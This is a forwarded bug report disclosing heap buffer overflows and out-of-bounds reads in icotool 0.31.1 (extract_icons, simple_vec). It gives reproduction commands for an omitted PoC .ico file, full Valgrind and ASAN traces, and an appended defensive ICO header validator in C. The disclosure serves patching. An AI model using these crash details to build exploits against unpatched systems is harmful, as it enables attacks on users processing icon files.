Package: icoutils Version: 0.31.1
---------- Forwarded message ----------
From: op7ic \x00 <op7...@gmail.com>
Date: Wed, Feb 1, 2017 at 11:28 AM
Subject: Buffer Overflows and OOBs in icotool
To: frank.rich...@gmail.com, os...@osk.mine.nu

Please see attached reports.
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.1
Release Status: release
Author: Jerzy Kramarz

Description: A buffer overflow was observed in the "extract_icons" function in the "extract.c" source file. This issue can be triggered by processing a corrupted ico file and will result in an icotool crash. To replicate this issue, use the attached sample below and execute the following command:

PoC file: [base64-encoded sample omitted]

Repeat-By:
echo <above base64> > PoC.ico.b64
base64 -d PoC.ico.b64 > PoC.ico
/home/ico-target/icoutils-0.31.1/icotool/icotool -l PoC.ico

Valgrind Output:
valgrind /home/ico-target/icoutils-clean/icotool/icotool -l /tmp/PoC.ico
==5033== Memcheck, a memory error detector
==5033== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==5033== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==5033== Command: /home/ico-target/icoutils-clean/icotool/icotool -l /tmp/PoC.ico
==5033==
/tmp/PoC.ico: x_pels_per_meter field in bitmap should be zero
/tmp/PoC.ico: y_pels_per_meter field in bitmap should be zero
/tmp/PoC.ico: clr_important field in bitmap should be zero
/tmp/PoC.ico: planes field in bitmap should be one
==5033== Invalid write of size 1
==5033==    at 0x4041A4: extract_icons (extract.c:320)
==5033==    by 0x402420: main (main.c:323)
==5033==  Address 0x5926d9c is 0 bytes after a block of size 28 alloc'd
==5033==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==5033==    by 0x4090C8: xmalloc (xmalloc.c:41)
==5033==    by 0x404512: extract_icons (extract.c:304)
==5033==    by 0x402420: main (main.c:323)
==5033==
==5033== Invalid write of size 1
==5033==    at 0x4041B3: extract_icons (extract.c:321)
==5033==    by 0x402420: main (main.c:323)
==5033==  Address 0x5926d9d is 1 bytes after a block of size 28 alloc'd
==5033==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==5033==    by 0x4090C8: xmalloc (xmalloc.c:41)
==5033==    by 0x404512: extract_icons (extract.c:304)
==5033==    by 0x402420: main (main.c:323)
==5033==
==5033== Invalid write of size 1
==5033==    at 0x4041BB: extract_icons (extract.c:322)
==5033==    by 0x402420: main (main.c:323)
==5033==  Address 0x5926d9e is 2 bytes after a block of size 28 alloc'd
==5033==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==5033==    by 0x4090C8: xmalloc (xmalloc.c:41)
==5033==    by 0x404512: extract_icons (extract.c:304)
==5033==    by 0x402420: main (main.c:323)
==5033==
==5033== Invalid write of size 1
==5033==    at 0x4041F0: extract_icons (extract.c:331)
==5033==    by 0x402420: main (main.c:323)
==5033==  Address 0x5926d9f is 3 bytes after a block of size 28 alloc'd
==5033==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==5033==    by 0x4090C8: xmalloc (xmalloc.c:41)
==5033==    by 0x404512: extract_icons (extract.c:304)
==5033==    by 0x402420: main (main.c:323)
==5033==
==5033== Invalid read of size 1
==5033==    at 0x40382A: simple_vec (extract.c:425)
==5033==    by 0x40420C: extract_icons (extract.c:313)
==5033==    by 0x402420: main (main.c:323)
==5033==  Address 0x5926b00 is 0 bytes after a block of size 512 alloc'd
==5033==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==5033==    by 0x4090C8: xmalloc (xmalloc.c:41)
==5033==    by 0x403EDF: extract_icons (extract.c:250)
==5033==    by 0x402420: main (main.c:323)
==5033==
==5033== Invalid read of size 1
==5033==    at 0x4037E9: simple_vec (extract.c:421)
==5033==    by 0x4041DB: extract_icons (extract.c:331)
==5033==    by 0x402420: main (main.c:323)
==5033==  Address 0x5926d40 is 0 bytes after a block of size 512 alloc'd
==5033==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==5033==    by 0x4090C8: xmalloc (xmalloc.c:41)
==5033==    by 0x403F0E: extract_icons (extract.c:254)
==5033==    by 0x402420: main (main.c:323)
==5033==
==5033==
==5033== Process terminating with default action of signal 11 (SIGSEGV)
==5033==  Bad permissions for mapped region at address 0x5D23000
==5033==    at 0x4041A4: extract_icons (extract.c:320)
==5033==    by 0x402420: main (main.c:323)
==5033==
==5033== HEAP SUMMARY:
==5033==     in use at exit: 1,819 bytes in 8 blocks
==5033==   total heap usage: 57 allocs, 49 frees, 11,791 bytes allocated
==5033==
==5033== LEAK SUMMARY:
==5033==    definitely lost: 28 bytes in 1 blocks
==5033==    indirectly lost: 0 bytes in 0 blocks
==5033==      possibly lost: 0 bytes in 0 blocks
==5033==    still reachable: 1,791 bytes in 7 blocks
==5033==         suppressed: 0 bytes in 0 blocks
==5033== Rerun with --leak-check=full to see details of leaked memory
==5033==
==5033== For counts of detected and suppressed errors, rerun with: -v
==5033== ERROR SUMMARY: 6261389 errors from 6 contexts (suppressed: 0 from 0)
Segmentation fault

ASAN Report (needs to be compiled with -fsanitize=address):
==4989==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000efcc at pc 0x4109cc bp 0x76e1b07ad8f0 sp 0x76e1b07ad8e8
WRITE of size 1 at 0x60300000efcc thread T0
    #0 0x4109cb in extract_icons /home/ico-target/icoutils-0.31.1/icotool/extract.c:320
    #1 0x403efd in main /home/ico-target/icoutils-0.31.1/icotool/main.c:323
    #2 0x67062c940b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #3 0x404e15 (/home/ico-target/icoutils-0.31.1/icotool/icotool+0x404e15)
0x60300000efcc is located 0 bytes to the right of 28-byte region [0x60300000efb0,0x60300000efcc)
allocated by thread T0 here:
    #0 0x67062d46173f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x43c2e0 in xmalloc /home/ico-target/icoutils-0.31.1/lib/xmalloc.c:41
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ico-target/icoutils-0.31.1/icotool/extract.c:320 extract_icons
Shadow bytes around the buggy address:
  0x0c067fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c067fff9df0: fa fa fa fa fa fa 00 00 00[04]fa fa 00 00 00 fa
  0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==4989==ABORTING
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.1
Release Status: release
Author: Jerzy Kramarz

Description: An out-of-bounds read leading to a buffer overflow was observed in the "simple_vec" function in the "extract.c" source file. This issue can be triggered by processing a corrupted ico file and will result in an icotool crash. To replicate this issue, use the attached sample below and execute the following command:

PoC file: [base64-encoded sample omitted]

Repeat-By:
echo <above base64> > PoC.ico.b64
base64 -d PoC.ico.b64 > PoC.ico
/home/ico-target/icoutils-0.31.1/icotool/icotool -l PoC.ico

Valgrind Output:
valgrind /home/ico-target/icoutils-clean/icotool/icotool -l /tmp/PoC.ico
==4859== Memcheck, a memory error detector
==4859== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==4859== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==4859== Command: /home/ico-target/icoutils-clean/icotool/icotool -l /tmp/PoC.ico
==4859==
/tmp/PoC.ico: y_pels_per_meter field in bitmap should be zero
/tmp/PoC.ico: skipping 64 bytes of extended bitmap header
/tmp/PoC.ico: incorrect total size of bitmap (296 specified; 360 real)
==4859== Invalid read of size 1
==4859==    at 0x40382A: simple_vec (extract.c:425)
==4859==    by 0x40420C: extract_icons (extract.c:313)
==4859==    by 0x402420: main (main.c:323)
==4859==  Address 0x5926730 is 0 bytes after a block of size 128 alloc'd
==4859==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==4859==    by 0x4090C8: xmalloc (xmalloc.c:41)
==4859==    by 0x403EDF: extract_icons (extract.c:250)
==4859==    by 0x402420: main (main.c:323)
==4859==
==4859== Invalid write of size 1
==4859==    at 0x4041A4: extract_icons (extract.c:320)
==4859==    by 0x402420: main (main.c:323)
==4859==  Address 0x5926830 is 0 bytes after a block of size 64 alloc'd
==4859==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==4859==    by 0x4090C8: xmalloc (xmalloc.c:41)
==4859==    by 0x404512: extract_icons (extract.c:304)
==4859==    by 0x402420: main (main.c:323)
==4859==
==4859== Invalid write of size 1
==4859==    at 0x4041B3: extract_icons (extract.c:321)
==4859==    by 0x402420: main (main.c:323)
==4859==  Address 0x5926831 is 1 bytes after a block of size 64 alloc'd
==4859==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==4859==    by 0x4090C8: xmalloc (xmalloc.c:41)
==4859==    by 0x404512: extract_icons (extract.c:304)
==4859==    by 0x402420: main (main.c:323)
==4859==
==4859== Invalid write of size 1
==4859==    at 0x4041BB: extract_icons (extract.c:322)
==4859==    by 0x402420: main (main.c:323)
==4859==  Address 0x5926832 is 2 bytes after a block of size 64 alloc'd
==4859==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==4859==    by 0x4090C8: xmalloc (xmalloc.c:41)
==4859==    by 0x404512: extract_icons (extract.c:304)
==4859==    by 0x402420: main (main.c:323)
==4859==
==4859== Invalid write of size 1
==4859==    at 0x4041F0: extract_icons (extract.c:331)
==4859==    by 0x402420: main (main.c:323)
==4859==  Address 0x5926833 is 3 bytes after a block of size 64 alloc'd
==4859==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==4859==    by 0x4090C8: xmalloc (xmalloc.c:41)
==4859==    by 0x404512: extract_icons (extract.c:304)
==4859==    by 0x402420: main (main.c:323)
==4859==
==4859== Invalid read of size 1
==4859==    at 0x4037E9: simple_vec (extract.c:421)
==4859==    by 0x4041DB: extract_icons (extract.c:331)
==4859==    by 0x402420: main (main.c:323)
==4859==  Address 0x59267b0 is 0 bytes after a block of size 64 alloc'd
==4859==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==4859==    by 0x4090C8: xmalloc (xmalloc.c:41)
==4859==    by 0x403F0E: extract_icons (extract.c:254)
==4859==    by 0x402420: main (main.c:323)
==4859==
==4859==
==4859== Process terminating with default action of signal 11 (SIGSEGV)
==4859==  Bad permissions for mapped region at address 0x5D23000
==4859==    at 0x4041A4: extract_icons (extract.c:320)
==4859==    by 0x402420: main (main.c:323)
==4859==
==4859== HEAP SUMMARY:
==4859==     in use at exit: 1,063 bytes in 8 blocks
==4859==   total heap usage: 54 allocs, 46 frees, 10,630 bytes allocated
==4859==
==4859== LEAK SUMMARY:
==4859==    definitely lost: 64 bytes in 1 blocks
==4859==    indirectly lost: 0 bytes in 0 blocks
==4859==      possibly lost: 0 bytes in 0 blocks
==4859==    still reachable: 999 bytes in 7 blocks
==4859==         suppressed: 0 bytes in 0 blocks
==4859== Rerun with --leak-check=full to see details of leaked memory
==4859==
==4859== For counts of detected and suppressed errors, rerun with: -v
==4859== ERROR SUMMARY: 6269097 errors from 6 contexts (suppressed: 0 from 0)
Segmentation fault

ASAN Report (needs to be compiled with -fsanitize=address):
==4814==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000be80 at pc 0x410a94 bp 0x7bbe58928250 sp 0x7bbe58928248
READ of size 1 at 0x60c00000be80 thread T0
    #0 0x410a93 in simple_vec /home/ico-target/icoutils-0.31.1/icotool/extract.c:425
    #1 0x410a93 in extract_icons /home/ico-target/icoutils-0.31.1/icotool/extract.c:313
    #2 0x403efd in main /home/ico-target/icoutils-0.31.1/icotool/main.c:323
    #3 0x797d4a25eb44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #4 0x404e15 (/home/ico-target/icoutils-0.31.1/icotool/icotool+0x404e15)
0x60c00000be80 is located 0 bytes to the right of 128-byte region [0x60c00000be00,0x60c00000be80)
allocated by thread T0 here:
    #0 0x797d4ad7f73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x43c2e0 in xmalloc /home/ico-target/icoutils-0.31.1/lib/xmalloc.c:41
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ico-target/icoutils-0.31.1/icotool/extract.c:425 simple_vec
Shadow bytes around the buggy address:
  0x0c187fff9780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff97a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff97b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff97c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c187fff97d0:[fa]fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c187fff97e0: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
  0x0c187fff97f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c187fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff9810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff9820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==4814==ABORTING
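Both reports above localize the crashes to heap blocks that extract_icons and simple_vec size from header fields and then access past their end, and icotool's own warnings ("planes field in bitmap should be one", "incorrect total size of bitmap (296 specified; 360 real)") show the inconsistencies it noticed but did not treat as fatal. The C below is an added example, not icoutils code and not a patch for extract.c: a validator that checks every ICONDIR, ICONDIRENTRY and BITMAPINFOHEADER field a decoder would allocate for or read from against the real file length and the declared resource size, rejecting the file before any buffer is sized from it. The function names, return codes and the constructed 1x1 sample are this example's own assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Little-endian field access; every caller has already bounds-checked the pointer. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | (uint32_t)rd16(p + 2) << 16; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

/* Bitmap scanlines are padded to a 32-bit boundary. */
static uint64_t row_bytes(uint32_t width, uint32_t bpp) {
    return ((uint64_t)width * bpp + 31) / 32 * 4;
}

/* Check one ICONDIRENTRY and the BITMAPINFOHEADER it points at. Returns 0 only when every
 * byte a decoder would allocate for or read lies inside the declared resource, and the
 * resource lies inside the file; each rejection has its own negative code. */
int validate_entry(const uint8_t *file, size_t len, size_t entry_off) {
    if (entry_off + 16 > len) return -1;                      /* entry itself truncated */
    const uint8_t *e = file + entry_off;
    uint32_t res_size = rd32(e + 8), img_off = rd32(e + 12);
    if (img_off > len || res_size > len - img_off) return -2; /* resource outside file */
    if (res_size < 40) return -3;                             /* no room for the header */
    const uint8_t *h = file + img_off;
    uint32_t hdr_size = rd32(h), width = rd32(h + 4), height2 = rd32(h + 8);
    uint16_t planes = rd16(h + 12), bpp = rd16(h + 14);
    uint32_t clr_used = rd32(h + 32);
    if (hdr_size < 40 || hdr_size > res_size) return -4;      /* extended header overruns */
    if (planes != 1) return -5;                               /* "planes should be one" */
    if (bpp != 1 && bpp != 4 && bpp != 8 && bpp != 24 && bpp != 32) return -6;
    if (width == 0 || width > 256 || height2 == 0 || height2 > 512 || height2 % 2) return -7;
    uint64_t palette = 0;
    if (bpp <= 8) {                                           /* palette bounded by bpp */
        uint64_t entries = clr_used ? clr_used : 1u << bpp;
        if (entries > 1u << bpp) return -8;
        palette = entries * 4;
    }
    uint32_t height = height2 / 2;                            /* XOR and AND masks stacked */
    uint64_t need = hdr_size + palette + (row_bytes(width, bpp) + row_bytes(width, 1)) * height;
    if (need > res_size) return -9;                           /* real size exceeds declared */
    return 0;
}

/* Walk the ICONDIR; the entry count is checked against the file length before use. */
int validate_ico(const uint8_t *file, size_t len) {
    if (len < 6 || rd16(file) != 0 || rd16(file + 2) != 1) return -10;
    size_t count = rd16(file + 4);
    if (count == 0 || count * 16 > len - 6) return -11;       /* directory truncated */
    for (size_t i = 0; i < count; i++) {
        int rc = validate_entry(file, len, 6 + i * 16);
        if (rc) return rc;
    }
    return 0;
}

/* Constructed sample, not the report's PoC: a 1x1 4-bpp icon with all-zero palette and
 * masks, real size 40 + 64 + 4 + 4 = 112 bytes. Writes 134 bytes and returns that length. */
size_t build_sample(uint8_t out[134], uint32_t declared, uint16_t planes, uint32_t clr_used) {
    memset(out, 0, 134);
    wr16(out + 2, 1); wr16(out + 4, 1);                       /* type = icon, one entry */
    uint8_t *e = out + 6;
    e[0] = 1; e[1] = 1; e[2] = 16; wr16(e + 4, 1); wr16(e + 6, 4);
    wr32(e + 8, declared); wr32(e + 12, 22);                  /* data follows the directory */
    uint8_t *h = out + 22;
    wr32(h, 40); wr32(h + 4, 1); wr32(h + 8, 2);              /* header size, width, 2*height */
    wr16(h + 12, planes); wr16(h + 14, 4); wr32(h + 32, clr_used);
    return 134;
}

int main(void) {
    uint8_t buf[134]; size_t n = build_sample(buf, 112, 1, 0);
    printf("well-formed: %d\n", validate_ico(buf, n));        /* 0 */
    build_sample(buf, 100, 1, 0); printf("declared size below real size: %d\n", validate_ico(buf, n)); /* -9 */
    return 0;
}
```

The `-9` case mirrors icotool's "incorrect total size of bitmap" warning, and the `-2` and `-11` paths are what a truncated sample hits; a decoder that refuses on any non-zero code never reaches the xmalloc'd buffers the reports show being overrun.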